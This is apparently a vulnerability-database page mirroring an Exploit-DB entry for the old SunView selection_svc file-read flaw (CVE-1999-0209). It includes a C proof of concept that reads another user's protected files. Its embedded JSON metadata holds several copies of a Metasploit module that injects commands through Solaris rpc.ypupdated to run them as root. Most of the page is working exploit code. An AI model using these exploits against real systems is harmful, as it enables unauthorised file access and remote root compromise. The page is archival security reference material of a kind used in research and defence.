Search...

SunView SunOS <= 4.1.1 selection_svc Vulnerability

1990-08-14T00:00:00

ID EDB-ID:19040
Type exploitdb
Reporter Peter Shipley
Modified 1990-08-14T00:00:00

Description

SunView selection_svc Vulnerability. CVE-1999-0209. Remote exploit for solaris platform

                                        
                                            Source:  http://www.securityfocus.com/bid/8/info

On Sun3 and Sun4 systems, a remote system can read any file that is readable to the user running SunView. On the 386i, a remote system can read any file on the workstation running SunView regardless of protections. Note that if root runs Sunview, all files are potentially accessible by a remote system.

Sunview does not kill the selection_svc process when the user quits from Sunview. Thus, unless the process is killed, remote systems can still read files that were readable to the last user that ran Sunview. Under these circumstances, once a user has run Sunview, start using another window system (such as X11), or even logoff, but still have files accessible to remote systems.

/* SELN_HOLD_FILE
 * For use where someone has a selection_svc runnning as them, after an
 * invocation of suntools:
 *
 * % cat their_private_file
 * their_private_file: Permission denied
 * % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow
 * % ./seln_hold_file their_private_file
 * % get_selection 2
 * &lt; contents of their_private_file &gt;
 * %
 */

#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;suntool/seln.h&gt;

main(argc, argv)
  int argc;
  char *argv[];
{
  Seln_result     ret;

  if (argc != 2) {
    (void) fprintf(stderr, "usage: seln_grab file1\n");
    exit(1);
  }

  ret = seln_hold_file(SELN_SECONDARY, argv[1]);
  seln_dump_result(stdout, &ret);
  printf("\n");
}

/*
 * Local variables:
 * compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsun
tool -lsunwindow"
 * end:
 *
 * Static required because _mem_ops not included in ld.so
 */

JSON Vulners Source

Initial Source

{"id": "EDB-ID:19040", "hash": "cac285f0ffe8f93082613712bd5b9b1c", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SunView SunOS <= 4.1.1 selection_svc Vulnerability", "description": "SunView selection_svc Vulnerability. CVE-1999-0209. Remote exploit for solaris platform", "published": "1990-08-14T00:00:00", "modified": "1990-08-14T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/19040/", "reporter": "Peter Shipley", "references": [], "cvelist": ["CVE-1999-0209"], "lastseen": "2016-02-02T10:56:52", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/19040/", "sourceData": "Source: http://www.securityfocus.com/bid/8/info\r\n\r\nOn Sun3 and Sun4 systems, a remote system can read any file that is readable to the user running SunView. On the 386i, a remote system can read any file on the workstation running SunView regardless of protections. Note that if root runs Sunview, all files are potentially accessible by a remote system.\r\n\r\nSunview does not kill the selection_svc process when the user quits from Sunview. Thus, unless the process is killed, remote systems can still read files that were readable to the last user that ran Sunview. Under these circumstances, once a user has run Sunview, start using another window system (such as X11), or even logoff, but still have files accessible to remote systems.\r\n\r\n/* SELN_HOLD_FILE\r\n * For use where someone has a selection_svc runnning as them, after an\r\n * invocation of suntools:\r\n *\r\n * % cat their_private_file\r\n * their_private_file: Permission denied\r\n * % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow\r\n * % ./seln_hold_file their_private_file\r\n * % get_selection 2\r\n * < contents of their_private_file >\r\n * %\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <suntool/seln.h>\r\n\r\nmain(argc, argv)\r\n int argc;\r\n char *argv[];\r\n{\r\n Seln_result ret;\r\n\r\n if (argc != 2) {\r\n (void) fprintf(stderr, \"usage: seln_grab file1\\n\");\r\n exit(1);\r\n }\r\n\r\n ret = seln_hold_file(SELN_SECONDARY, argv[1]);\r\n seln_dump_result(stdout, &ret);\r\n printf(\"\\n\");\r\n}\r\n\r\n/*\r\n * Local variables:\r\n * compile-command: \"cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsun\r\ntool -lsunwindow\"\r\n * end:\r\n *\r\n * Static required because _mem_ops not included in ld.so\r\n */", "osvdbidlist": ["881"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2016-09-03T02:10:21", "references": ["http://www.securityfocus.com/bid/8"], "edition": 1, "description": "The SunView (SunTools) selection_svc facility allows remote users to read files.", "reporter": "NVD", "published": "1990-08-14T00:00:00", "type": "cve", "title": "CVE-1999-0209", "enchantments": {"score": {"modified": "2016-09-03T02:10:21", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-1999-0209"], "scanner": [], "cpe": ["cpe:/o:sun:sunos:4.0.1", "cpe:/o:sun:sunos:4.0.3", "cpe:/o:sun:sunos:4.0", "cpe:/o:sun:sunos:3.5", "cpe:/o:sun:sunos:4.1.1", "cpe:/o:sun:sunos:4.1", "cpe:/o:sun:sunos:4.0.2"], "modified": "2008-09-09T08:34:01", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0209", "id": "CVE-1999-0209", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-01T23:36:45", "osvdbidlist": ["11517"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Solaris ypupdated Command Execution. CVE-1999-0209. Remote exploit for solaris platform", "reporter": "metasploit", "published": "2010-07-25T00:00:00", "type": "exploitdb", "title": "Solaris ypupdated Command Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0209"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-07-25T00:00:00", "id": "EDB-ID:16326", "href": "https://www.exploit-db.com/exploits/16326/", "sourceData": "##\r\n# $Id: ypupdated_exec.rb 9929 2010-07-25 21:37:54Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::SunRPC\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Solaris ypupdated Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis exploit targets a weakness in the way the ypupdated RPC\r\n\t\t\t\tapplication uses the command shell when handling a MAP UPDATE\r\n\t\t\t\trequest. Extra commands may be launched through this command\r\n\t\t\t\tshell, which runs as root on the remote host, by passing\r\n\t\t\t\tcommands in the format '|<command>'.\r\n\r\n\t\t\t\tVulnerable systems include Solaris 2.7, 8, 9, and 10, when\r\n\t\t\t\typupdated is started with the '-i' command-line option.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'I)ruid <druid@caughq.org>' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9929 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '1999-0209'],\r\n\t\t\t\t\t['OSVDB', '11517'],\r\n\t\t\t\t\t['BID', '1749'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' => [ ['Automatic', { }], ],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 12 1994'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),\r\n\t\t\t\tOptInt.new('GID', [false, 'GID to emulate', 0]),\r\n\t\t\t\tOptInt.new('UID', [false, 'UID to emulate', 0])\r\n\t\t\t], self.class\r\n\t\t)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\thostname = datastore['HOSTNAME']\r\n\t\tprogram = 100028\r\n\t\tprogver = 1\r\n\t\tprocedure = 1\r\n\r\n\t\tprint_status('Sending PortMap request for ypupdated program')\r\n\t\tpport = sunrpc_create('udp', program, progver)\r\n\r\n\t\tprint_status(\"Sending MAP UPDATE request with command '#{payload.encoded}'\")\r\n\t\tprint_status('Waiting for response...')\r\n\t\tsunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])\r\n\t\tcommand = '|' + payload.encoded\r\n\t\tmsg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)\r\n\t\tsunrpc_call(procedure, msg)\r\n\r\n\t\tsunrpc_destroy\r\n\r\n\t\tprint_status('No Errors, appears to have succeeded!')\r\n\trescue ::Rex::Proto::SunRPC::RPCTimeout\r\n\t\tprint_error('Warning: ' + $!)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/16326/"}, {"lastseen": "2016-01-31T23:01:32", "osvdbidlist": ["11517"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Sun Solaris. CVE-1999-0209. Remote exploit for solaris platform", "reporter": "I)ruid", "published": "2008-04-04T00:00:00", "type": "exploitdb", "title": "Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit meta", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0209"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2008-04-04T00:00:00", "id": "EDB-ID:5366", "href": "https://www.exploit-db.com/exploits/5366/", "sourceData": " ____ ____ __ __\r\n / \\ / \\ | | | |\r\n ----====####/ /\\__\\##/ /\\ \\##| |##| |####====----\r\n | | | |__| | | | | |\r\n | | ___ | __ | | | | |\r\n ------======######\\ \\/ /#| |##| |#| |##| |######======------\r\n \\____/ |__| |__| \\______/\r\n \r\n Computer Academic Underground\r\n http://www.caughq.org\r\n Exploit Code\r\n\r\n===============/========================================================\r\nExploit ID: CAU-EX-2008-0001\r\nRelease Date: 2008.04.04\r\nTitle: ypupdated_exec.rb\r\nDescription: Solaris ypupdated Command Execution\r\nTested: Solaris x86/sparc 10, sparc 9, 8, 2.7\r\nAttributes: Remote, NULL Auth, Elevated Privileges, Metasploit\r\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0001.txt\r\nAuthor/Email: I)ruid <druid (@) caughq.org>\r\n===============/========================================================\r\n\r\nDescription\r\n===========\r\n\r\nThis exploit targets a weakness in the way the ypupdated RPC application\r\nuses the command shell when handling a MAP UPDATE request. Extra\r\ncommands may be launched through this command shell, which runs as root\r\non the remote host, by passing commands in the format '|<command>'.\r\n\r\n\r\nCredits\r\n=======\r\n\r\nJosh D. <mcpheea@cadvision.com> from Avalon Security Research is\r\ncredited with originally discovering this vulnerability.\r\n\r\nThis Metasploit exploit module was modeled after kcope's exploit\r\nreleased to Milw0rm on 2008.03.20.\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://osvdb.org/displayvuln.php?osvdb_id=11517\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209\r\nhttp://www.securityfocus.com/bid/1749/info\r\nhttp://www.milw0rm.com/exploits/5282\r\n\r\n\r\nMetasploit\r\n==========\r\n\r\nrequire 'msf/core'\r\n\r\nmodule Msf\r\n\r\nclass Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote\r\n\r\n\tinclude Exploit::Remote::SunRPC\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Solaris ypupdated Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis exploit targets a weakness in the way the ypupdated RPC\r\n\t\t\t\tapplication uses the command shell when handling a MAP UPDATE\r\n\t\t\t\trequest. Extra commands may be launched through this command\r\n\t\t\t\tshell, which runs as root on the remote host, by passing\r\n\t\t\t\tcommands in the format '|<command>'.\r\n\r\n\t\t\t\tVulnerable systems include Solaris 2.7, 8, 9, and 10, when\r\n\t\t\t\typupdated is started with the '-i' command-line option.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'I)ruid <druid@caughq.org>' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 4498 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['BID', '1749'],\r\n\t\t\t\t\t['CVE', '1999-0209'],\r\n\t\t\t\t\t['OSVDB', '11517'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'Targets' => [ ['Automatic', { }], ],\r\n\t\t\t'DefaultTarget' => 0\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),\r\n\t\t\t\tOptInt.new('GID', [false, 'GID to emulate', 0]),\r\n\t\t\t\tOptInt.new('UID', [false, 'UID to emulate', 0])\r\n\t\t\t], self.class\r\n\t\t)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\thostname = datastore['HOSTNAME']\r\n\t\tprogram = 100028\r\n\t\tprogver = 1\r\n\t\tprocedure = 1\r\n\r\n\t\tprint_status 'Sending PortMap request for ypupdated program'\r\n\t\tpport = sunrpc_create('udp', program, progver)\r\n\r\n\t\tprint_status \"Sending MAP UPDATE request with command '#{payload.encoded}'\"\r\n\t\tprint_status 'Waiting for response...'\r\n\t\tsunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])\r\n\t\tcommand = '|' + payload.encoded\r\n\t\tmsg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)\r\n\t\tsunrpc_call(procedure, msg)\r\n\r\n\t\tsunrpc_destroy\r\n\r\n\t\tprint_good 'No Errors, appears to have succeeded!'\r\n\trescue ::Rex::Proto::SunRPC::RPCTimeout\r\n\t\tprint_status 'Warning: ' + $!\r\n\t\tprint_status 'Exploit may or may not have succeeded.'\r\n\tend\r\n\r\nend\r\nend\t\r\n\r\n# milw0rm.com [2008-04-04]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/5366/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 122\n[CVE-1999-0209](https://vulners.com/cve/CVE-1999-0209)\nCIAC Advisory: a-32\nCIAC Advisory: b-11\nCERT: CA-1990-05\nBugtraq ID: 8\n", "reporter": "OSVDB", "published": "1990-09-05T00:00:00", "title": "SunOS SunView selection_svc Facility Remote Arbitrary File Access", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-1999-0209"], "modified": "1990-09-05T00:00:00", "id": "OSVDB:881", "href": "https://vulners.com/osvdb/OSVDB:881", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:45", "references": [], "edition": 1, "description": "", "reporter": "I)ruid", "published": "2009-10-28T00:00:00", "type": "packetstorm", "title": "Solaris ypupdated Command Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0209"], "modified": "2009-10-28T00:00:00", "href": "https://packetstormsecurity.com/files/82327/Solaris-ypupdated-Command-Execution.html", "id": "PACKETSTORM:82327", "sourceData": "`require 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::SunRPC \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Solaris ypupdated Command Execution', \n'Description' => %q{ \nThis exploit targets a weakness in the way the ypupdated RPC \napplication uses the command shell when handling a MAP UPDATE \nrequest. Extra commands may be launched through this command \nshell, which runs as root on the remote host, by passing \ncommands in the format '|<command>'. \n \nVulnerable systems include Solaris 2.7, 8, 9, and 10, when \nypupdated is started with the '-i' command-line option. \n}, \n'Author' => [ 'I)ruid <druid@caughq.org>' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '1999-0209'], \n['OSVDB', '11517'], \n['BID', '1749'], \n], \n'Privileged' => true, \n'Platform' => ['unix', 'solaris'], \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'Space' => 1024, \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl telnet', \n} \n}, \n'Targets' => [ ['Automatic', { }], ], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']), \nOptInt.new('GID', [false, 'GID to emulate', 0]), \nOptInt.new('UID', [false, 'UID to emulate', 0]) \n], self.class \n) \nend \n \ndef exploit \nhostname = datastore['HOSTNAME'] \nprogram = 100028 \nprogver = 1 \nprocedure = 1 \n \nprint_status 'Sending PortMap request for ypupdated program' \npport = sunrpc_create('udp', program, progver) \n \nprint_status \"Sending MAP UPDATE request with command '#{payload.encoded}'\" \nprint_status 'Waiting for response...' \nsunrpc_authunix(hostname, datastore['UID'], datastore['GID'], []) \ncommand = '|' + payload.encoded \nmsg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000) \nsunrpc_call(procedure, msg) \n \nsunrpc_destroy \n \nprint_good 'No Errors, appears to have succeeded!' \nrescue ::Rex::Proto::SunRPC::RPCTimeout \nprint_status 'Warning: ' + $! \nprint_status 'Exploit may or may not have succeeded.' \nend \n \nend \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82327/ypupdated_exec.rb.txt"}], "metasploit": [{"lastseen": "2018-08-29T15:42:21", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|<command>'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option.", "reporter": "Rapid7", "published": "2008-04-18T01:33:09", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/solaris/sunrpc/ypupdated_exec.rb", "type": "metasploit", "title": "Solaris ypupdated Command Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0209"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/SOLARIS/SUNRPC/YPUPDATED_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::SunRPC\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Solaris ypupdated Command Execution',\n 'Description' => %q{\n This exploit targets a weakness in the way the ypupdated RPC\n application uses the command shell when handling a MAP UPDATE\n request. Extra commands may be launched through this command\n shell, which runs as root on the remote host, by passing\n commands in the format '|<command>'.\n\n Vulnerable systems include Solaris 2.7, 8, 9, and 10, when\n ypupdated is started with the '-i' command-line option.\n },\n 'Author' => [ 'I)ruid <druid[at]caughq.org>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '1999-0209'],\n ['OSVDB', '11517'],\n ['BID', '1749'],\n ],\n 'Privileged' => true,\n 'Platform' => %w{ solaris unix },\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet',\n }\n },\n 'Targets' => [ ['Automatic', { }], ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 12 1994'\n ))\n\n register_options(\n [\n OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),\n OptInt.new('GID', [false, 'GID to emulate', 0]),\n OptInt.new('UID', [false, 'UID to emulate', 0])\n ], self.class\n )\n end\n\n def exploit\n hostname = datastore['HOSTNAME']\n program = 100028\n progver = 1\n procedure = 1\n\n print_status('Sending PortMap request for ypupdated program')\n pport = sunrpc_create('udp', program, progver)\n\n print_status(\"Sending MAP UPDATE request with command '#{payload.encoded}'\")\n print_status('Waiting for response...')\n sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])\n command = '|' + payload.encoded\n msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)\n sunrpc_call(procedure, msg)\n\n sunrpc_destroy\n\n print_status('No Errors, appears to have succeeded!')\n rescue ::Rex::Proto::SunRPC::RPCTimeout\n print_warning('Warning: ' + $!)\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/solaris/sunrpc/ypupdated_exec.rb"}]}

SunView SunOS &lt;= 4.1.1 selection_svc Vulnerability

Description

SunView selection_svc Vulnerability. CVE-1999-0209. Remote exploit for solaris platform

SunView SunOS <= 4.1.1 selection_svc Vulnerability